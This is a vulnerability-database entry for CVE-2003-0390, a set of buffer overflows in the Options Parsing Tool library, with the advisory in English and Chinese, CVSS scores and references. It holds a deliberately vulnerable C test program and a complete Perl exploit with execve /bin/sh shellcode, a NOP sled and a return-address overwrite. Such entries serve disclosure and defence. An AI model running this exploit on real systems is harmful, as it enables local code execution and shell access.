CVE-2003-0390
CVSS4.6
发布时间 :2003-07-02 00:00:00
修订时间 :2016-10-17 22:33:14
NMCOE    

[原文]Multiple buffer overflows in Options Parsing Tool (OPT) shared library 3.18 and earlier, when used in setuid programs, may allow local users to execute arbitrary code via long command line options that are fed into macros such as opt_warn_2, as used in functions such as opt_atoi.


[CNNVD]Options Parsing Tool (OPT) shared library代码执行漏洞(CNNVD-200307-012)

        Options Parsing Tool (OPT) shared library 3.18及其更早的版本在setuid程序中使用时存在多个缓冲区溢出漏洞。本地用户利用该漏洞借助一个如在opt_atoi等函数中使用opt_warn_2注入宏的超长命令行选项执行任意代码。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0390
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0390
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-012
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105121918523320&w=2
(UNKNOWN)  BUGTRAQ  20030424 SRT2003-04-24-1532 - Options Parsing Tool library buffer overflows.
http://marc.info/?l=bugtraq&m=105371246204866&w=2
(UNKNOWN)  BUGTRAQ  20030523 Re: Options Parsing Tool library buffer overflows.
http://nis-www.lanl.gov/~jt/Software/opt/opt-3.19.tar.gz
(PATCH)  CONFIRM  http://nis-www.lanl.gov/~jt/Software/opt/opt-3.19.tar.gz

- 漏洞信息

Options Parsing Tool (OPT) shared library代码执行漏洞
中危 缓冲区溢出
2003-07-02 00:00:00 2005-11-29 00:00:00
本地  
        Options Parsing Tool (OPT) shared library 3.18及其更早的版本在setuid程序中使用时存在多个缓冲区溢出漏洞。本地用户利用该漏洞借助一个如在opt_atoi等函数中使用opt_warn_2注入宏的超长命令行选项执行任意代码。

- 公告与补丁

        

- 漏洞信息 (22537)

Libopt.a 3.1x Error Logging Buffer Overflow Vulnerability (1) (EDBID:22537)
linux dos
2003-04-24 Verified
0 kf
N/A [点击下载]
source: http://www.securityfocus.com/bid/7433/info

Libopt library has been reported prone to a buffer overflow vulnerability.

It has been reported that several Libopt.a error logging functions, may be prone to buffer overflow vulnerabilities when handling excessive data. The data may be supplied as an argument to a program linked to the vulnerable library. This condition arises from a lack of sufficient bounds checking performed on the user-supplied data, before it is copied into a memory buffer. As a result the bounds of an internal stack-based memory buffer may be overflowed and adjacent memory corrupted with attacker supplied data. It should be noted that no SUID applications linked to this library are currently known.

Although unconfirmed this vulnerability may be exploited to execute arbitrary attacker supplied code.

It should be noted that although this vulnerability was reported to affect Libopt.a version 3.18 previous versions might also be affected. 

/* To compile vuln.c :                              */
/* cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a */

main(int *argc, char **argv)
{
  /* use OPT opt_atoi() */
        int y = opt_atoi(argv[1]);        printf("opt_atoi(): %i\n", y);
}

		

- 漏洞信息 (22538)

Libopt.a 3.1x Error Logging Buffer Overflow Vulnerability (2) (EDBID:22538)
linux local
2003-04-24 Verified
0 jlanthea
N/A [点击下载]
source: http://www.securityfocus.com/bid/7433/info
 
Libopt library has been reported prone to a buffer overflow vulnerability.
 
It has been reported that several Libopt.a error logging functions, may be prone to buffer overflow vulnerabilities when handling excessive data. The data may be supplied as an argument to a program linked to the vulnerable library. This condition arises from a lack of sufficient bounds checking performed on the user-supplied data, before it is copied into a memory buffer. As a result the bounds of an internal stack-based memory buffer may be overflowed and adjacent memory corrupted with attacker supplied data. It should be noted that no SUID applications linked to this library are currently known.
 
Although unconfirmed this vulnerability may be exploited to execute arbitrary attacker supplied code.
 
It should be noted that although this vulnerability was reported to affect Libopt.a version 3.18 previous versions might also be affected.

#!/usr/bin/perl
#
# expl-optatoi.pl : opt_atoi() function exploit (from Options Parsing
# Tool shared library opt-3.18 and prior) for this vulnerable code.
#
# vuln.c :
#    main(int *argc, char **argv)
#    {
#        /* use OPT opt_atoi() */
#        int y = opt_atoi(argv[1]);
#        printf("opt_atoi(): %i\n", y);
#     }
#
# cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a
#
# Author :
#    jlanthea [contact@jlanthea.net]
#
# Syntax :
#    perl expl-optatoi.pl <offset>   # works for me with offset = -1090


$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
             "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
             "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
             "\xff\xff/bin/sh";


$len = 1032;        # The length needed to own EIP.
$ret = 0xbffff6c0;  # The stack pointer at crash time
$nop = "\x90";      # x86 NOP
$offset = 0;    # Default offset to try.


if (@ARGV == 1) {
    $offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");

$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

exec("/path/to/vuln $buffer");

		

- 漏洞信息

12306
Options Parsing Tool (OPT) Library Multiple Error Message Functions Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-04-24 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站